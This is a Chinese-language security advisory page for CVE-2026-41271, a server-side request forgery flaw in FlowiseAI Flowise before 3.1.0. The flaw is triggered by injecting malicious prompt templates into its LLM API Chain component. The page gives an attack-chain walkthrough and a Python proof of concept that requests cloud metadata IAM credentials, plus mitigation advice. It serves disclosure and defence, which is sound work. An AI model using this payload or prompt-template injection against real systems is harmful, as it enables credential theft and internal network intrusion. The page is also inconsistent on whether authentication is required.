IPBUF安全漏洞报告
English
CVE-2026-41271 CVSS 8.3 高危

CVE-2026-41271 FlowiseAI SSRF漏洞

披露日期: 2026-04-23
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41271
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
8.3 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
FlowiseAI Flowise

相关标签

SSRF服务端请求伪造FlowiseAIFlowiseCVE-2026-41271LLM安全

漏洞概述

FlowiseAI Flowise是一款用于构建定制化大语言模型流程的拖拽式用户界面。在3.1.0版本之前,其POST/GET API Chain组件中存在服务端请求伪造(SSRF)漏洞。未经身份验证的攻击者可利用此漏洞,通过注入恶意提示模板绕过API文档约束,强迫服务器向内部或外部系统发起任意HTTP请求,从而导致内网探测及数据泄露风险。

技术细节

该漏洞根因在于FlowiseAI在3.1.0版本之前的POST/GET API Chain组件中,缺乏对用户输入提示模板的严格验证与过滤。攻击者无需经过身份认证,即可向受影响的接口发送特制的恶意数据包。漏洞的核心在于攻击者能够通过注入恶意提示模板,绕过系统原本预设的API文档约束机制。这使得服务器被诱导向攻击者指定的任意内网或外网地址发起HTTP请求。由于请求是由服务器发起的,攻击者可以利用此漏洞绕过网络防火墙等边界防御措施,对内网敏感服务(如云平台元数据服务169.254.169.254、内部管理后台等)进行端口扫描、服务指纹识别或数据读取。这不仅可能导致敏感信息的直接泄露,还可能为进一步的内网横向移动或系统渗透提供关键入口。

攻击链分析

STEP 1
侦察
攻击者识别出目标正在使用FlowiseAI Flowise,且版本低于3.1.0。
STEP 2
构造载荷
攻击者构造包含恶意URL(如内网地址)的JSON数据包,利用API Chain组件处理提示模板的特性。
STEP 3
发送请求
攻击者向Flowise的API端点发送未经身份验证的POST/GET请求,注入恶意载荷。
STEP 4
服务端请求
Flowise服务器解析载荷,绕过API文档限制,向攻击者指定的内部地址发起HTTP请求。
STEP 5
数据回传
内部服务响应请求,攻击者通过响应包获取敏感数据或确认内网服务存活状态。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # Target Flowise API endpoint (example) target_url = "http://<flowise-host>/api/v1/prediction/<flow-id>" # Malicious payload targeting internal metadata service (SSRF) # The specific JSON structure depends on the API Chain configuration payload = { "question": "Extract data from internal service", "overrideConfig": { "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" } } headers = { "Content-Type": "application/json" } try: # Sending the malicious request response = requests.post(target_url, data=json.dumps(payload), headers=headers) if response.status_code == 200: print("[+] SSRF Triggered successfully!") print("[+] Response from internal service:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

FlowiseAI Flowise < 3.1.0

防御指南

临时缓解措施
如果无法立即升级,建议在网络层面对Flowise服务器的出站流量进行白名单限制,禁止其访问内网敏感网段(如127.0.0.1、169.254.169.254等)和未知的公网地址。同时,临时禁用受影响的API Chain组件功能以降低风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表